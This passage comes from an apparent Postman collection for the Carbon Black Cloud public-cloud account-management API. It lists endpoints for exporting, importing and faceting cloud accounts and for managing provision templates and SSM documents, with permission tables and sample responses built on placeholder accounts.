filename=\"PublicCloud_accounts_export_2023-09-01-124743.csv\""},{"key":"Traceid","value":"d090240a-f6b4-476f-8af0-8ec1af1398b7"}],"cookie":[],"responseTime":null,"body":"orgKey,accountId,accountProvider,region,accountName,accountOwnerName,accountOwnerEmail,environment,credentialRoleArn,credentialExternalId,credentialApplicationId,credentialTenantId,credentialSecretId,credentialsecretExpiry,credentialIdentityProviderProjectNo,credentialServiceAccountEmail,credentialIdentityPoolId,credentialIdentityProviderId,credentialVerificationStatus,credentialVerificationCode,credentialVerificationMessage,credentialLastVerifiedTime,createTime,createdBy,updateTime,updatedBy,regionEventChannelTemplateVersion,regionEventChannelConnected,regionEventChannelLastConnectedTime,regionEventChannelCreatedTime,regionEventChannelUpdatedTime,regionInventorySyncStatus,regionInventorySyncMessage,regionInventorySyncCode,regionInventoryLastSyncTime,regionInventoryFullSyncBy,regionCreatedTime,regionCreatedBy\r\nABCD1234,1234567890,AWS,us-east-1,AWS Account 1,Test,test@testorg.com,DEV,arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot,afd5813b-e3c6-471a-b30e-3a8577f89111,,,,,,,,,FAIL,CREDENTIAL_ERROR,\"User: arn:aws:sts::605728677111:assumed-role/mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod/694be2a6-mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot (Service: Sts, Status Code: 403, Request ID: ac3f0cbc-099a-4657-a6bf-9f2ccc115be2, Extended Request ID: null)\",2023-09-01T12:09:34.338372Z,2023-09-01T12:09:33.873423Z,ABCD1234,2023-09-01T12:09:33.873423Z,ABCD1234,,false,,,,FAIL,\"User: arn:aws:sts::605728677111:assumed-role/mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod/694be2a6-mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot (Service: Sts, Status Code: 403, Request ID: 692c7941-c098-499c-8f64-fc48fa02a2bb, Extended Request ID: null)\",FULL_SYNC_CREDENTIAL_ERROR,2023-09-01T12:45:10.139753Z,ABCD1234,2023-09-01T12:09:33.884078Z,ABCD1234\r\n"}],"_postman_id":"a064e0d5-cc24-4454-838d-cd262c6d7991"},{"name":"Import Cloud Accounts by CSV","id":"30cd29f4-de3f-4ce5-b379-3fc2fcb61d1f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"text/csv"}],"body":{"mode":"raw","raw":"accountId,accountProvider,accountName,accountOwnerName,accountOwnerEmail,environment,credentialRoleArn,credentialExternalId,regions\n1234567890,AWS,AWS Account 1,Test,test@testorg.com,DEV,arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot,afd5813b-e3c6-471a-b30e-3a8577f89111,us-east-1"},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/import","description":"<h3 id=\"import-cloud-accounts-by-csv\">Import Cloud Accounts by CSV</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>CREATE, UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">accountId,accountProvider,accountName,accountOwnerName,accountOwnerEmail,environment,credentialRoleArn,credentialExternalId,regions\\r\\n\n1234567890,AWS,AWS Account 1,Test,test@testorg.com,DEV,arn:aws:iam::1234567890:user/test@testorg.com,QWERTY,us-east-1\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#import-cloud-accounts-by-csv\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","accounts","import"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"e57c3044-19aa-4958-89c4-af6d56cbfccb","name":"Import Cloud Accounts by CSV","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"text/csv"}],"body":{"mode":"raw","raw":"accountId,accountProvider,accountName,accountOwnerName,accountOwnerEmail,environment,credentialRoleArn,credentialExternalId,regions\n1234567890,AWS,AWS Account 1,Test,test@testorg.com,DEV,arn:aws:iam::1234567890:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot,afd5813b-e3c6-471a-b30e-3a8577f89311,us-east-1"},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/import"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:16:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"92"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"8c0727e2-2c1b-4a7a-8b4e-1f533baa1040"}],"cookie":[],"responseTime":null,"body":"{\n    \"failed\": null,\n    \"success\": true,\n    \"error_code\": null,\n    \"message\": \"Successful\",\n    \"follow_up_api\": null\n}"}],"_postman_id":"30cd29f4-de3f-4ce5-b379-3fc2fcb61d1f"},{"name":"Facet Cloud Accounts","id":"4d2bcea4-bdb3-4883-aff6-d9e8c3feea6c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"name\": [\n            \"AWS Account 1\"\n        ],\n        \"cloud_provider\": [\n            \"AWS\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"environment\": [\n            \"DEV\",\n            \"PROD\"\n        ],\n        \"credential.verification_status\": [\n            \"FAIL\"\n        ]\n    },\n    \"terms\": {\n        \"rows\": 20,\n        \"fields\": [\n            \"CLOUD_PROVIDER\"\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/_facet","description":"<h3 id=\"facet-cloud-accounts\">Facet Cloud Accounts</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"name\": [\"&lt;string&gt;\"],\n    \"cloud_provider\": [\"&lt;string&gt;\"],\n    \"cloud_provider_account_id\": [\"&lt;string&gt;\"],\n    \"credential.verification_status\": [\"&lt;string&gt;\"],\n    \"parent_account_id\": [\"&lt;string&gt;\"],\n    \"is_onboarded\": &lt;boolean&gt;,\n    \"environment\": [\"&lt;string&gt;\"],\n    \"aws_account_type\": [\"&lt;string&gt;\"],\n  },\n  \"terms\": {\n    \"rows\": 20,\n    \"fields\": [\"&lt;string&gt;\"]\n  }\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#facet-cloud-account\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","accounts","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"974f4150-6427-428e-9260-cb769cff279b","name":"Facet Cloud Accounts","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"name\": [\n            \"AWS Account 1\"\n        ],\n        \"cloud_provider\": [\n            \"AWS\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"credential.verification_status\": [\n            \"IN_PROGRESS\",\n            \"SUCCESS\",\n            \"FAIL\"\n        ],\n        \"environment\": [\n            \"DEV\",\n            \"PROD\"\n        ]\n    },\n    \"terms\": {\n        \"rows\": 20,\n        \"fields\": [\n            \"CLOUD_PROVIDER\"\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/accounts/_facet"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 12:59:56 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"85"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"ca8574fc-2595-4f76-a39a-5d757393434b"}],"cookie":[],"responseTime":null,"body":"{\n    \"terms\": [\n        {\n            \"field\": \"CLOUD_PROVIDER\",\n            \"values\": [\n                {\n                    \"total\": 1,\n                    \"id\": \"AWS\",\n                    \"name\": \"AWS\"\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"4d2bcea4-bdb3-4883-aff6-d9e8c3feea6c"},{"name":"Create Provision Template","id":"6b4fa6a0-d8e5-4d75-b0cb-af691451e4cb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"event_channel_template_version\": \"1.0.0\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}/regions/{{region}}/provision_template","description":"<h3 id=\"create-provision-template\">Create Provision Template</h3>\n<p>Create provision template detail for given account and region and keeping others unchanged.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.ingestion.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"event_channel_template_version\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#create-provision-template\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","cloud_providers","{{cloud_provider}}","accounts","{{cloud_account_id}}","regions","{{region}}","provision_template"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"9f542d70-86a7-4382-84de-0b32a1b7effd","name":"Create Provision Template","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"event_channel_template_version\": \"1.0.0\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}/regions/{{region}}/provision_template"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:09:09 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"78"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"4c0ebc03-c03b-408d-88dc-0fd63b9cdd12"}],"cookie":[],"responseTime":null,"body":"{\n    \"success\": true,\n    \"error_code\": null,\n    \"message\": \"Successful\",\n    \"follow_up_api\": null\n}"}],"_postman_id":"6b4fa6a0-d8e5-4d75-b0cb-af691451e4cb"},{"name":"Delete Provision Template","id":"da213e54-456f-4a46-94c5-9b86c024fc44","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}/regions/{{region}}/provision_template","description":"<h3 id=\"delete-provision-template\">Delete Provision Template</h3>\n<p>Delete provision template detail for given account and region and keeping others unchanged.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.ingestion.events</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#delete-provision-template\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","cloud_providers","{{cloud_provider}}","accounts","{{cloud_account_id}}","regions","{{region}}","provision_template"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"518fd9e4-01ec-4aa3-8445-0c245364fdfb","name":"Delete Provision Template","originalRequest":{"method":"DELETE","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}/regions/{{region}}/provision_template"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:09:31 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"78"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"0648bc4c-d072-417d-8e98-b98cc5473b65"}],"cookie":[],"responseTime":null,"body":"{\n    \"success\": true,\n    \"error_code\": null,\n    \"message\": \"Successful\",\n    \"follow_up_api\": null\n}"}],"_postman_id":"da213e54-456f-4a46-94c5-9b86c024fc44"},{"name":"Add SSM Document","id":"fd093ad3-e1ef-4c2e-9f3a-4bf7dfd19930","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"ssm_document_version\": \"1.0.0\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}/regions/{{region}}/ssm_document","description":"<h3 id=\"add-ssm-document\">Add SSM Document</h3>\n<p>Add ssm document creation details for given account and region and keeping others unchanged.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.ingestion.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"ssm_document_version\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#add-ssm-document\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","cloud_providers","{{cloud_provider}}","accounts","{{cloud_account_id}}","regions","{{region}}","ssm_document"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"1e993d60-acc9-40de-97cf-244519720aa8","name":"Add SSM Document","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"ssm_document_version\": \"1.0.0\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}/regions/{{region}}/ssm_document"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:09:46 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"78"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"a7a2a8fd-afa8-41cf-828c-ebef75dc22ca"}],"cookie":[],"responseTime":null,"body":"{\n    \"success\": true,\n    \"error_code\": null,\n    \"message\": \"Successful\",\n    \"follow_up_api\": null\n}"}],"_postman_id":"fd093ad3-e1ef-4c2e-9f3a-4bf7dfd19930"},{"name":"Delete SSM Document","id":"0aaf0357-38b7-49ef-82db-9e45a85d92f4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}/regions/{{region}}/ssm_document","description":"<h3 id=\"delete-ssm-document\">Delete SSM Document</h3>\n<p>Delete ssm document creation details for given account and region and keeping others unchanged.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.ingestion.events</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#delete-ssm-document\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","orgs","{{cb_org_key}}","cloud_providers","{{cloud_provider}}","accounts","{{cloud_account_id}}","regions","{{region}}","ssm_document"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"4ae77824-f6d3-4f53-90ba-be40c58751bd","name":"Delete SSM Document","originalRequest":{"method":"DELETE","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/cloud_providers/{{cloud_provider}}/accounts/{{cloud_account_id}}/regions/{{region}}/ssm_document"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:10:02 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"78"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"5b78788b-d108-47c1-89ca-5265671656cd"}],"cookie":[],"responseTime":null,"body":"{\n    \"success\": true,\n    \"error_code\": null,\n    \"message\": \"Successful\",\n    \"follow_up_api\": null\n}"}],"_postman_id":"0aaf0357-38b7-49ef-82db-9e45a85d92f4"},{"name":"Download Cloud Account Import Template","id":"2e3729bc-c49f-44a3-9d6b-a52fa9aa32a3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/accounts/import/template","description":"<h3 id=\"download-cloud-account-import-template\">Download Cloud Account Import Template</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>CREATE, UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#download-cloud-account-import-template\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","accounts","import","template"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"2bad525d-89c9-4c43-a668-a379e9c7c3a4","name":"Download Cloud Account Import Template","originalRequest":{"method":"GET","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/accounts/import/template"},"status":"OK","code":200,"_postman_previewlanguage":"plain","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:10:14 GMT"},{"key":"Content-Type","value":"text/csv"},{"key":"Content-Length","value":"133"},{"key":"Connection","value":"keep-alive"},{"key":"Accept-Ranges","value":"bytes"},{"key":"Content-Disposition","value":"attachment; filename=\"AWS_accounts_import_template.csv\""},{"key":"Traceid","value":"4240dc2f-c32c-48f0-849d-5169d17d0216"}],"cookie":[],"responseTime":null,"body":"accountId,accountProvider,accountName,accountOwnerName,accountOwnerEmail,environment,credentialRoleArn,credentialExternalId,regions\r\n"}],"_postman_id":"2e3729bc-c49f-44a3-9d6b-a52fa9aa32a3"},{"name":"Get Details of a Cloud Provider","id":"fd25dcd3-d91c-4c61-bc0d-d6b5f8afb666","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/cloud_providers/{{cloud_provider}}","description":"<h3 id=\"get-details-of-a-cloud-provider\">Get Details of a Cloud Provider</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#get-details-of-a-cloud-provider\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["public-cloud","account-management","v1","cloud_providers","{{cloud_provider}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"303ec105-432a-4094-a690-e0c2d55c5299","name":"Get Details of a Cloud Provider","originalRequest":{"method":"GET","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/cloud_providers/{{cloud_provider}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:10:26 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"2140"},{"key":"Connection","value":"keep-alive"},{"key":"Traceid","value":"4a4909f9-b296-4a0b-80a6-32ca8eab2f4a"}],"cookie":[],"responseTime":null,"body":"{\n    \"regions\": [\n        {\n            \"id\": \"ap-south-1\",\n            \"name\": \"Asia Pacific (Mumbai)\"\n        },\n        {\n            \"id\": \"eu-south-1\",\n            \"name\": \"Europe (Milan)\"\n        },\n        {\n            \"id\": \"us-gov-east-1\",\n            \"name\": \"AWS GovCloud (US-East)\"\n        },\n        {\n            \"id\": \"ca-central-1\",\n            \"name\": \"Canada (Central)\"\n        },\n        {\n            \"id\": \"eu-central-1\",\n            \"name\": \"Europe (Frankfurt)\"\n        },\n        {\n            \"id\": \"us-west-1\",\n            \"name\": \"US West (N. California)\"\n        },\n        {\n            \"id\": \"us-west-2\",\n            \"name\": \"US West (Oregon)\"\n        },\n        {\n            \"id\": \"af-south-1\",\n            \"name\": \"Africa (Cape Town)\"\n        },\n        {\n            \"id\": \"eu-north-1\",\n            \"name\": \"Europe (Stockholm)\"\n        },\n        {\n            \"id\": \"eu-west-3\",\n            \"name\": \"Europe (Paris)\"\n        },\n        {\n            \"id\": \"eu-west-2\",\n            \"name\": \"Europe (London)\"\n        },\n        {\n            \"id\": \"eu-west-1\",\n            \"name\": \"Europe (Ireland)\"\n        },\n        {\n            \"id\": \"ap-northeast-3\",\n            \"name\": \"Asia Pacific (Osaka)\"\n        },\n        {\n            \"id\": \"ap-northeast-2\",\n            \"name\": \"Asia Pacific (Seoul)\"\n        },\n        {\n            \"id\": \"ap-northeast-1\",\n            \"name\": \"Asia Pacific (Tokyo)\"\n        },\n        {\n            \"id\": \"me-south-1\",\n            \"name\": \"Middle East (Bahrain)\"\n        },\n        {\n            \"id\": \"sa-east-1\",\n            \"name\": \"South America (Sao Paulo)\"\n        },\n        {\n            \"id\": \"ap-east-1\",\n            \"name\": \"Asia Pacific (Hong Kong)\"\n        },\n        {\n            \"id\": \"cn-north-1\",\n            \"name\": \"China (Beijing)\"\n        },\n        {\n            \"id\": \"us-gov-west-1\",\n            \"name\": \"AWS GovCloud (US-West)\"\n        },\n        {\n            \"id\": \"ap-southeast-1\",\n            \"name\": \"Asia Pacific (Singapore)\"\n        },\n        {\n            \"id\": \"ap-southeast-2\",\n            \"name\": \"Asia Pacific (Sydney)\"\n        },\n        {\n            \"id\": \"us-iso-east-1\",\n            \"name\": \"US ISO East\"\n        },\n        {\n            \"id\": \"us-east-1\",\n            \"name\": \"US East (N. Virginia)\"\n        },\n        {\n            \"id\": \"us-east-2\",\n            \"name\": \"US East (Ohio)\"\n        },\n        {\n            \"id\": \"cn-northwest-1\",\n            \"name\": \"China (Ningxia)\"\n        },\n        {\n            \"id\": \"us-isob-east-1\",\n            \"name\": \"US ISOB East (Ohio)\"\n        }\n    ],\n    \"environments\": [\n        \"DEV\",\n        \"STAGING\",\n        \"TEST\",\n        \"PROD\"\n    ],\n    \"onboarding_shell_script_url\": \"https://dev.cwp.cbdtest.io/public-cloud/dev01/aws/event-stream-setup/shell/setup-cbc-event-stream.sh\",\n    \"onboarding_powershell_script_url\": \"https://dev.cwp.cbdtest.io/public-cloud/dev01/aws/event-stream-setup/powershell/Setup-cbc-events-stream.ps1\",\n    \"trust_relationship_setup_details\": {\n        \"shell_script_url\": \"https://dev.cwp.cbdtest.io/public-cloud/dev01/aws/pre-onboarding-setup/shell/setup-cbc-pre-account-onboarding.sh\",\n        \"powershell_script_url\": \"https://dev.cwp.cbdtest.io/public-cloud/dev01/aws/pre-onboarding-setup/powershell/Setup-cbc-pre-account-onboarding.ps1\",\n        \"aws_collector_arn\": \"arn:aws:iam::605728677118:role/mcs-psc-dev-cwp-pc-aws-collector-us-east-1-pod\",\n        \"carbon_black_cloud_aws_account_id\": null\n    }\n}"}],"_postman_id":"fd25dcd3-d91c-4c61-bc0d-d6b5f8afb666"},{"name":"Get External ID for AWS Account","id":"f0c08865-af14-4c4c-a63a-ee38423e15f2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/public-cloud/account-management/v1/orgs/{{cb_org_key}}/external_id","description":"<h3 id=\"get-external-id-for-aws-account\">Get External ID for AWS Account</h3>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.accounts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/public-cloud-account-management#get-external-id-for-aws-account\">See 